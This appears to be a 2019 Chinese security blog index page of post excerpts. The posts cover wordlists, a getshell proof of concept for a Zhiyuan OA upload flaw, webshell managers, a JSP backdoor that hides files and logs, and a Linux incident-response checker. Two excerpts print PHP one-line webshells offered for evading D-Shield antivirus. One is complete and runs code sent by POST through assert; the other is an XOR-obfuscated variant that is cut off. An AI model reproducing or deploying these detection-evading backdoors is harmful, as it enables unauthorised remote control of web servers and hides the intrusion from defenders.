SecLists:安全测试伴侣,渗透测试资源收集项目
- 2019-07-22
- 安全工具
SecLists介绍 SecLists是安全测试人员的伴侣工具箱,渗透测试工具资源收集。它是在安全评估期间使用的多类型渗透测试资源的集合。类型包括用户名,密码字典,URL,敏感数据,模糊测试payloads,Webshell,XSS...
Exploit-Dictionary:渗透测试字典一份
- 2019-07-16
- 安全工具
收藏整理的渗透测试字典 字典内容已经去重 Port 出现频率较高的端口号,平时我是使用Telnet来扫描端口,就没有每个端口号进行换行。 User 主要是一些从网络上收集的用户密码字典。 /IDC_p...
致远OA getshell POC&EXP
- 2019-07-03
- Vulndb
致远OA getshell 2019年6月26日,网络中出现致远OA的0day漏洞信息。该漏洞可造成任意文件上传,恶意攻击者通过精心构造POST数据来上传JSP Webshell,提升服务器权限,从而控制服务器或对系统造成破坏。 漏...
这里有一个渗透测试辅助工具资源库
- 2019-06-26
- 安全工具
这是一个提供渗透测试辅助工具(pentest-tool)、资源文件的一个项目。 辅助工具 提供轻量级的易扩展的工具,可以快速编写exploit、添加漏洞验证/扫描规则、添加指纹规则、爆破规则等;包含以下功能: ...
GScan:Linux Checklist自动化检测,结果聚合|黑客攻击溯源
- 2019-06-20
- 安全工具
GScan介绍 GScan是一个适用于安全应急响应人员对Linux主机排查时的安全工具。实现主机侧Checklist的全面自动化化扫描检测(包含常见检查项并可以自由扩展),根据检测结果自动数据聚合,进行黑客攻击路径溯源...
异或免杀D盾PHP一句话
之前给的过D盾一句话webshell现在都已被查杀,补个 <?php header('HTTP/1.1 404'); class ZXVG { public $c=''; public function __destruct() { $_0='&'^"\x47"; $_1=...
再丢个过D盾免杀PHP一句话木马
前几天给的那个已经进套餐,今天再扔个免杀过D盾的 <?php function today($a, $b) { array_map($a, $b); } today(assert, array($_POST['x'])); ?> ...
PhpSploit – 交互式shell后门控制工具
- 2019-06-04
- 安全工具
PhpSploit Phpsploit 是一个远程控制框架,通过 HTTP 在客户机和 web 服务器之间提供隐蔽的交互式 shell 连接,能够为权限提升等目访问网络服务器。我们可理解为它是一款单webshell管理工具。 混淆通...
HideShell – JSP后门可隐藏文件隐藏日志
- 2019-05-30
- 安全工具
HideShell后门 HideShell是一个JSP后门木马,除了访问日志之外,还可以在Tomcat下隐藏任意JSP文件(实现隐藏webshell),隐藏访问日志。hideshell.jsp隐藏的JSP在下次重新引导Tomcat实例之前保持accessbile。...
Webshell-Sniper 基于终端的Webshell管理器
- 2019-05-28
- 安全工具
Webshell-Sniper介绍 Webshell-Sniper是一款使用Python编写的基于终端的Webshell管理器,和以往我们分享的Webshell管理工具有所不同,所有操作都在终端中完成。使用它可对您的网站进行远程管理。虽然它没有...